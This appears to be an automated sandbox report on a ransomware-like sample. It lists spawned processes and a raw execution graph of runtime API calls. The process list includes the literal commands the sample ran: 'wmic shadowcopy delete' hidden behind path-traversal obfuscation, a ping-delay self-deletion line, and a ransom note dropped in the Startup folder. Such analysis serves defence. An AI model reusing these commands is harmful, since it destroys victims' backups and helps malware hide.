                                                                                                    Target ID:27
                                                                                                    Start time:03:27:55
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xe30000
                                                                                                    File size:902'856 bytes
                                                                                                    MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:28
                                                                                                    Start time:03:28:00
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\xGRceo\xGRc\..\..\Windows\xGRc\xGRc\..\..\system32\xGRc\xGRc\..\..\wbem\xGRc\xGRce\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:29
                                                                                                    Start time:03:28:00
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:30
                                                                                                    Start time:03:28:03
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xe30000
                                                                                                    File size:902'856 bytes
                                                                                                    MD5 hash:9049FABA5517305C44BD5F28398FB6B9
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:32
                                                                                                    Start time:03:28:07
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:33
                                                                                                    Start time:03:28:09
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\ZiHrdF\ZiHr\..\..\Windows\ZiHr\ZiHr\..\..\system32\ZiHr\ZiHr\..\..\wbem\ZiHr\ZiHrd\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:34
                                                                                                    Start time:03:28:09
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:39
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\klzShx\klzS\..\..\Windows\klzS\klzS\..\..\system32\klzS\klzS\..\..\wbem\klzS\klzSh\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:40
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:41
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:42
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:43
                                                                                                    Start time:03:28:25
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                    Imagebase:0x200000
                                                                                                    File size:18'944 bytes
                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:46
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:c:\NTdKVj\NTdK\..\..\Windows\NTdK\NTdK\..\..\system32\NTdK\NTdK\..\..\wbem\NTdK\NTdKV\..\..\wmic.exe shadowcopy delete
                                                                                                    Imagebase:0x7ff7ceca0000
                                                                                                    File size:576'000 bytes
                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:47
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\user\AppData\Local\Temp\eryy65ty.exe"
                                                                                                    Imagebase:0xa40000
                                                                                                    File size:236'544 bytes
                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:48
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:49
                                                                                                    Start time:03:28:30
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff6ee680000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:50
                                                                                                    Start time:03:28:31
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                    Wow64 process (32bit):true
                                                                                                    Commandline:ping 1.1.1.1 -n 1 -w 3000
                                                                                                    Imagebase:0x200000
                                                                                                    File size:18'944 bytes
                                                                                                    MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:true

                                                                                                    Target ID:51
                                                                                                    Start time:03:28:32
                                                                                                    Start date:15/12/2024
                                                                                                    Path:C:\Windows\System32\notepad.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\system32\NOTEPAD.EXE" C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Decryptfiles.txt
                                                                                                    Imagebase:0x7ff702c00000
                                                                                                    File size:201'216 bytes
                                                                                                    MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                                                                    Has elevated privileges:false
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Has exited:false


                                                                                                      Execution Graph

                                                                                                      Execution Coverage:2.7%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0.9%
                                                                                                      Total number of Nodes:1543
                                                                                                      Total number of Limit Nodes:13
API calls 16214->16217 16219 6d40d335 std::ios_base::_Init 26 API calls 16216->16219 16217->16216 16218->16221 16220 6d4017f8 16219->16220 16292 6d409030 16220->16292 16221->16214 16223 6d40171b error_info_injector 16221->16223 16224 6d408fcd ___std_exception_copy 27 API calls 16223->16224 16226 6d40177c 16224->16226 16225 6d401815 error_info_injector 16225->16168 16226->16216 16227 6d4017ab error_info_injector 16226->16227 16228 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16227->16228 16229 6d4017e0 16228->16229 16229->16168 16296 6d40d2aa 16230->16296 16232 6d40d344 16307 6d40d352 IsProcessorFeaturePresent 16232->16307 16234 6d40d351 16238 6d407b06 16235->16238 16237 6d407b20 16237->16201 16238->16237 16239 6d40fe75 codecvt 7 API calls 16238->16239 16241 6d401370 Concurrency::cancel_current_task 16238->16241 16257 6d40d4bd 16238->16257 16239->16238 16240 6d407b2c 16240->16240 16241->16240 16242 6d409071 Concurrency::cancel_current_task RaiseException 16241->16242 16243 6d40138c 16242->16243 16244 6d408fcd ___std_exception_copy 27 API calls 16243->16244 16245 6d4013b3 16244->16245 16245->16201 16264 6d4059dd 16246->16264 16252 6d40137e Concurrency::cancel_current_task 16251->16252 16253 6d409071 Concurrency::cancel_current_task RaiseException 16252->16253 16254 6d40138c 16253->16254 16255 6d408fcd ___std_exception_copy 27 API calls 16254->16255 16256 6d4013b3 16255->16256 16256->16197 16262 6d41193c _unexpected 16257->16262 16258 6d41197a 16260 6d40de26 _free 20 API calls 16258->16260 16259 6d411965 HeapAlloc 16261 6d411978 16259->16261 16259->16262 16260->16261 16261->16238 16262->16258 16262->16259 16263 6d40fe75 codecvt 7 API calls 16262->16263 16263->16262 16269 6d405900 16264->16269 16267 6d409071 Concurrency::cancel_current_task RaiseException 16268 6d4059fc 16267->16268 16272 6d401270 16269->16272 16273 6d408fcd ___std_exception_copy 27 API calls 16272->16273 16274 6d4012a7 16273->16274 16275 6d407ac2 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16274->16275 16276 6d4012b7 16275->16276 16276->16267 16278 6d404d6b 16277->16278 16279 6d404e8e 16277->16279 16283 6d404db2 16278->16283 16284 6d404ddc 16278->16284 16280 6d401440 std::ios_base::_Init 28 API calls 16279->16280 16281 6d404e93 16280->16281 16282 6d401370 Concurrency::cancel_current_task 28 API calls 16281->16282 16290 6d404dc3 _Yarn 16282->16290 16283->16281 16285 6d404dbd 16283->16285 16287 6d407b01 codecvt 28 API calls 16284->16287 16284->16290 16286 6d407b01 codecvt 28 API calls 16285->16286 16286->16290 16287->16290 16288 6d40d335 std::ios_base::_Init 26 API calls 16289 6d404e9d 16288->16289 16290->16288 16291 6d404e4c _Yarn error_info_injector 16290->16291 16291->16207 16293 6d409044 16292->16293 16294 6d40903d 16292->16294 16293->16225 16295 6d40d143 ___std_exception_copy 20 API calls 16294->16295 16295->16293 16297 6d4120a4 _free 20 API calls 16296->16297 16298 6d40d2c0 16297->16298 16299 6d40d31f 16298->16299 16302 6d40d2ce 16298->16302 16300 6d40d352 __Getctype 11 API calls 16299->16300 16301 6d40d324 16300->16301 16303 6d40d2aa _Fputc 26 API calls 16301->16303 16304 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16302->16304 16305 6d40d331 16303->16305 16306 6d40d2f5 16304->16306 16305->16232 16306->16232 16308 6d40d35e 16307->16308 16311 6d40d160 16308->16311 16312 6d40d17c __InternalCxxFrameHandler __cftof 16311->16312 16313 6d40d1a8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16312->16313 16315 6d40d279 __InternalCxxFrameHandler 16313->16315 16314 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16316 6d40d297 GetCurrentProcess TerminateProcess 16314->16316 16315->16314 16316->16234 16318 6d410ea3 16317->16318 16319 6d410eb1 16317->16319 16318->16319 16321 6d410ec8 16318->16321 16320 6d40de26 _free 20 API calls 16319->16320 16325 6d410eb9 16320->16325 16323 6d410ec3 16321->16323 16324 
6d40de26 _free 20 API calls 16321->16324 16323->16186 16324->16325 16326 6d40d325 16325->16326 16327 6d40d2aa _Fputc 26 API calls 16326->16327 16328 6d40d331 16327->16328 16328->16323 16330 6d40337c 16329->16330 16331 6d403397 16330->16331 16332 6d4042c0 __DllMainCRTStartup@12 28 API calls 16330->16332 16331->16152 16331->16153 16332->16331 16352 6d405856 16333->16352 16336 6d405856 std::_Lockit::_Lockit 7 API calls 16338 6d404a0b 16336->16338 16337 6d404a2b __DllMainCRTStartup@12 16344 6d407b01 codecvt 28 API calls 16337->16344 16351 6d404a69 16337->16351 16358 6d4058ae 16338->16358 16339 6d4058ae std::_Lockit::~_Lockit 2 API calls 16340 6d404ade 16339->16340 16342 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16340->16342 16343 6d404af8 16342->16343 16343->16052 16345 6d404a74 16344->16345 16365 6d401a30 16345->16365 16351->16339 16353 6d405865 16352->16353 16354 6d40586c 16352->16354 16394 6d40d4a6 16353->16394 16356 6d4049eb 16354->16356 16399 6d4076cc EnterCriticalSection 16354->16399 16356->16336 16356->16337 16359 6d40d4b4 16358->16359 16360 6d4058b8 16358->16360 16452 6d40d48f LeaveCriticalSection 16359->16452 16364 6d4058cb 16360->16364 16451 6d4076da LeaveCriticalSection 16360->16451 16363 6d40d4bb 16363->16337 16364->16337 16366 6d405856 std::_Lockit::_Lockit 7 API calls 16365->16366 16367 6d401a60 16366->16367 16368 6d401ac6 16367->16368 16369 6d401aa8 16367->16369 16462 6d405a1d 16368->16462 16453 6d405cce 16369->16453 16374 6d401ae0 16592 6d405d19 16374->16592 16377 6d401b1b 16379 6d40d143 ___std_exception_copy 20 API calls 16377->16379 16380 6d401b32 16377->16380 16378 6d40d143 ___std_exception_copy 20 API calls 16378->16377 16379->16380 16381 6d401b49 16380->16381 16382 6d40d143 ___std_exception_copy 20 API calls 16380->16382 16383 6d401b60 16381->16383 16384 6d40d143 ___std_exception_copy 20 API calls 16381->16384 16382->16381 16385 6d401b77 16383->16385 16386 6d40d143 ___std_exception_copy 20 API calls 16383->16386 
16384->16383 16387 6d401b8e 16385->16387 16388 6d40d143 ___std_exception_copy 20 API calls 16385->16388 16386->16385 16389 6d4058ae std::_Lockit::~_Lockit 2 API calls 16387->16389 16388->16387 16390 6d401b9f 16389->16390 16391 6d405b9c 16390->16391 16392 6d407b01 codecvt 28 API calls 16391->16392 16393 6d405ba7 16392->16393 16393->16351 16400 6d415168 16394->16400 16399->16356 16421 6d414a6d 16400->16421 16420 6d41519a 16420->16420 16422 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16421->16422 16423 6d414a83 16422->16423 16424 6d414a87 16423->16424 16425 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16424->16425 16426 6d414a9d 16425->16426 16427 6d414aa1 16426->16427 16428 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16427->16428 16429 6d414ab7 16428->16429 16430 6d414abb 16429->16430 16431 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16430->16431 16432 6d414ad1 16431->16432 16433 6d414ad5 16432->16433 16434 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16433->16434 16435 6d414aeb 16434->16435 16436 6d414aef 16435->16436 16437 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16436->16437 16438 6d414b05 16437->16438 16439 6d414b09 16438->16439 16440 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16439->16440 16441 6d414b1f 16440->16441 16442 6d414b23 16441->16442 16443 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16442->16443 16444 6d414b39 16443->16444 16445 6d414b57 16444->16445 16446 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16445->16446 16447 6d414b6d 16446->16447 16448 6d414b3d 16447->16448 16449 6d414c53 std::_Locinfo::_Locinfo_dtor 5 API calls 16448->16449 16450 6d414b53 16449->16450 16450->16420 16451->16364 16452->16363 16467 6d40d720 16453->16467 16457 6d405cf2 16458 6d405d02 16457->16458 16459 6d40d720 std::_Locinfo::_Locinfo_dtor 70 API calls 16457->16459 16460 6d405b26 _Yarn 21 API calls 16458->16460 16459->16458 16461 6d401aaf 16460->16461 16461->16374 16589 6d405974 16462->16589 16465 6d409071 
Concurrency::cancel_current_task RaiseException 16466 6d405a3c 16465->16466 16468 6d415168 std::_Locinfo::_Locinfo_dtor 5 API calls 16467->16468 16469 6d40d72d 16468->16469 16478 6d40d4c8 16469->16478 16471 6d405cda 16472 6d405b26 16471->16472 16473 6d405b34 16472->16473 16477 6d405b5f _Yarn 16472->16477 16474 6d405b40 16473->16474 16475 6d40d143 ___std_exception_copy 20 API calls 16473->16475 16476 6d40d4bd ___std_exception_copy 21 API calls 16474->16476 16474->16477 16475->16474 16476->16477 16477->16457 16479 6d40d4d4 ___scrt_is_nonwritable_in_current_image 16478->16479 16486 6d40d447 EnterCriticalSection 16479->16486 16481 6d40d4e2 16487 6d40d519 16481->16487 16485 6d40d500 _Fputc 16485->16471 16486->16481 16512 6d40d683 16487->16512 16489 6d40d533 16506 6d40d4ef 16489->16506 16535 6d411f56 GetLastError 16489->16535 16491 6d40d545 16562 6d41571b 16491->16562 16496 6d40d352 __Getctype 11 API calls 16497 6d40d682 16496->16497 16498 6d41571b std::_Locinfo::_Locinfo_dtor 41 API calls 16499 6d40d5ad 16498->16499 16500 6d40d5b4 16499->16500 16501 6d40d5d6 16499->16501 16502 6d40d571 16500->16502 16503 6d40d5be 16500->16503 16505 6d411902 _free 20 API calls 16501->16505 16507 6d40d601 16501->16507 16502->16496 16502->16506 16504 6d411902 _free 20 API calls 16503->16504 16504->16506 16505->16507 16509 6d40d50d 16506->16509 16507->16506 16508 6d411902 _free 20 API calls 16507->16508 16508->16506 16588 6d40d48f LeaveCriticalSection 16509->16588 16511 6d40d517 16511->16485 16513 6d40d69d 16512->16513 16514 6d40d68f 16512->16514 16516 6d415472 __cftoe 41 API calls 16513->16516 16515 6d41358b std::_Locinfo::_Locinfo_dtor 66 API calls 16514->16515 16526 6d40d699 16515->16526 16517 6d40d6b4 16516->16517 16518 6d40d6f7 16517->16518 16519 6d414939 _unexpected 20 API calls 16517->16519 16520 6d40d352 __Getctype 11 API calls 16518->16520 16521 6d40d6cf 16519->16521 16522 6d40d71f 16520->16522 16523 6d40d702 16521->16523 16525 6d415472 __cftoe 41 API calls 16521->16525 16527 
6d415168 std::_Locinfo::_Locinfo_dtor 5 API calls 16522->16527 16524 6d411902 _free 20 API calls 16523->16524 16524->16526 16528 6d40d6e6 16525->16528 16526->16489 16531 6d40d72d 16527->16531 16529 6d40d6f9 16528->16529 16530 6d40d6ed 16528->16530 16532 6d41358b std::_Locinfo::_Locinfo_dtor 66 API calls 16529->16532 16530->16518 16530->16523 16533 6d40d4c8 std::_Locinfo::_Locinfo_dtor 70 API calls 16531->16533 16532->16523 16534 6d40d756 16533->16534 16534->16489 16536 6d411f72 16535->16536 16537 6d411f6c 16535->16537 16539 6d414e98 _unexpected 11 API calls 16536->16539 16544 6d411f78 16536->16544 16538 6d414e42 _unexpected 11 API calls 16537->16538 16538->16536 16540 6d411f8c 16539->16540 16541 6d411ffd SetLastError 16540->16541 16542 6d414939 _unexpected 20 API calls 16540->16542 16543 6d40f989 IsInExceptionSpec 36 API calls 16541->16543 16546 6d411f9c 16542->16546 16548 6d412009 16543->16548 16544->16541 16545 6d411f7d 16544->16545 16547 6d411ff1 SetLastError 16544->16547 16545->16541 16549 6d411fa4 16546->16549 16550 6d411fb9 16546->16550 16547->16491 16551 6d414e98 _unexpected 11 API calls 16549->16551 16552 6d414e98 _unexpected 11 API calls 16550->16552 16553 6d411fb0 16551->16553 16554 6d411fc5 16552->16554 16558 6d411902 _free 20 API calls 16553->16558 16555 6d411fc9 16554->16555 16556 6d411fd8 16554->16556 16559 6d414e98 _unexpected 11 API calls 16555->16559 16557 6d411d52 _unexpected 20 API calls 16556->16557 16560 6d411fe3 16557->16560 16558->16545 16559->16553 16561 6d411902 _free 20 API calls 16560->16561 16561->16544 16563 6d415732 16562->16563 16564 6d415764 16563->16564 16567 6d415736 16563->16567 16565 6d40de26 _free 20 API calls 16564->16565 16566 6d415769 16565->16566 16568 6d40d325 _Fputc 26 API calls 16566->16568 16569 6d415777 16567->16569 16570 6d415757 16567->16570 16577 6d40d56a 16568->16577 16571 6d415492 std::_Locinfo::_Locinfo_dtor 41 API calls 16569->16571 16572 6d40de26 _free 20 API calls 16570->16572 16573 6d415784 16571->16573 16574 
6d41575c 16572->16574 16575 6d41578c 16573->16575 16579 6d41579c 16573->16579 16576 6d40d325 _Fputc 26 API calls 16574->16576 16578 6d40de26 _free 20 API calls 16575->16578 16576->16577 16577->16502 16581 6d41193c 16577->16581 16578->16577 16579->16577 16580 6d40de26 _free 20 API calls 16579->16580 16580->16574 16582 6d41197a 16581->16582 16587 6d41194a _unexpected 16581->16587 16584 6d40de26 _free 20 API calls 16582->16584 16583 6d411965 HeapAlloc 16585 6d40d590 16583->16585 16583->16587 16584->16585 16585->16498 16585->16506 16586 6d40fe75 codecvt 7 API calls 16586->16587 16587->16582 16587->16583 16587->16586 16588->16511 16590 6d401270 std::invalid_argument::invalid_argument 27 API calls 16589->16590 16591 6d405986 16590->16591 16591->16465 16593 6d401b0b 16592->16593 16594 6d405d25 16592->16594 16593->16377 16593->16378 16595 6d40d720 std::_Locinfo::_Locinfo_dtor 70 API calls 16594->16595 16595->16593 16597 6d405856 std::_Lockit::_Lockit 7 API calls 16596->16597 16598 6d40453e 16597->16598 16599 6d405856 std::_Lockit::_Lockit 7 API calls 16598->16599 16603 6d404580 __DllMainCRTStartup@12 16598->16603 16600 6d404560 16599->16600 16604 6d4058ae std::_Lockit::~_Lockit 2 API calls 16600->16604 16601 6d4045c5 16602 6d4058ae std::_Lockit::~_Lockit 2 API calls 16601->16602 16605 6d40464d 16602->16605 16603->16601 16607 6d407b01 codecvt 28 API calls 16603->16607 16604->16603 16606 6d407ac2 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 16605->16606 16608 6d404666 16606->16608 16609 6d4045d0 16607->16609 16617 6d405220 16608->16617 16610 6d401a30 codecvt 73 API calls 16609->16610 16611 6d404600 16610->16611 16625 6d405de3 16611->16625 16614 6d401ae0 codecvt 71 API calls 16615 6d404628 16614->16615 16616 6d405b9c std::_Facet_Register 28 API calls 16615->16616 16616->16601 16619 6d405267 16617->16619 16618 6d405282 16621 6d401f30 std::ios_base::_Init 28 API calls 16618->16621 16619->16618 16620 6d4042c0 __DllMainCRTStartup@12 28 API calls 16619->16620 
16620->16618 16622 6d405368 16621->16622 16623 6d404997 16622->16623 16624 6d404380 __DllMainCRTStartup@12 28 API calls 16622->16624 16623->16066 16624->16623 16637 6d40d90c 16625->16637 16627 6d405dec __Getctype 16628 6d405e24 16627->16628 16629 6d405e06 16627->16629 16630 6d40d75a __Getctype 39 API calls 16628->16630 16642 6d40d75a 16629->16642 16632 6d405e0d 16630->16632 16647 6d40d933 16632->16647 16635 6d404616 16635->16614 16638 6d411f56 _unexpected 39 API calls 16637->16638 16639 6d40d917 16638->16639 16662 6d41219d 16639->16662 16643 6d411f56 _unexpected 39 API calls 16642->16643 16644 6d40d765 16643->16644 16645 6d41219d __Getctype 39 API calls 16644->16645 16646 6d40d775 16645->16646 16646->16632 16648 6d411f56 _unexpected 39 API calls 16647->16648 16649 6d40d93e 16648->16649 16650 6d41219d __Getctype 39 API calls 16649->16650 16651 6d405e35 16650->16651 16651->16635 16652 6d40dd4c 16651->16652 16653 6d40dd57 16652->16653 16654 6d40dd5b 16652->16654 16653->16635 16655 6d40d4bd ___std_exception_copy 21 API calls 16654->16655 16656 6d40dd80 16655->16656 16657 6d40dd87 16656->16657 16731 6d415e80 16656->16731 16657->16635 16660 6d40d352 __Getctype 11 API calls 16661 6d40ddac 16660->16661 16663 6d4121b0 16662->16663 16664 6d40d927 16662->16664 16663->16664 16666 6d41abe3 16663->16666 16664->16627 16667 6d41abef ___scrt_is_nonwritable_in_current_image 16666->16667 16668 6d411f56 _unexpected 39 API calls 16667->16668 16669 6d41abf8 16668->16669 16670 6d41ac46 _Fputc 16669->16670 16678 6d40d447 EnterCriticalSection 16669->16678 16670->16664 16672 6d41ac16 16679 6d41ac5a 16672->16679 16678->16672 16680 6d41ac2a 16679->16680 16681 6d41ac68 __Getctype 16679->16681 16683 6d41ac49 16680->16683 16681->16680 16682 6d41a996 __Getctype 20 API calls 16681->16682 16682->16680 16697 6d40d48f LeaveCriticalSection 16683->16697 16685 6d41ac3d 16685->16670 16686 6d40f989 16685->16686 16698 6d419545 16686->16698 16689 6d40f999 16691 6d40f9a3 IsProcessorFeaturePresent 
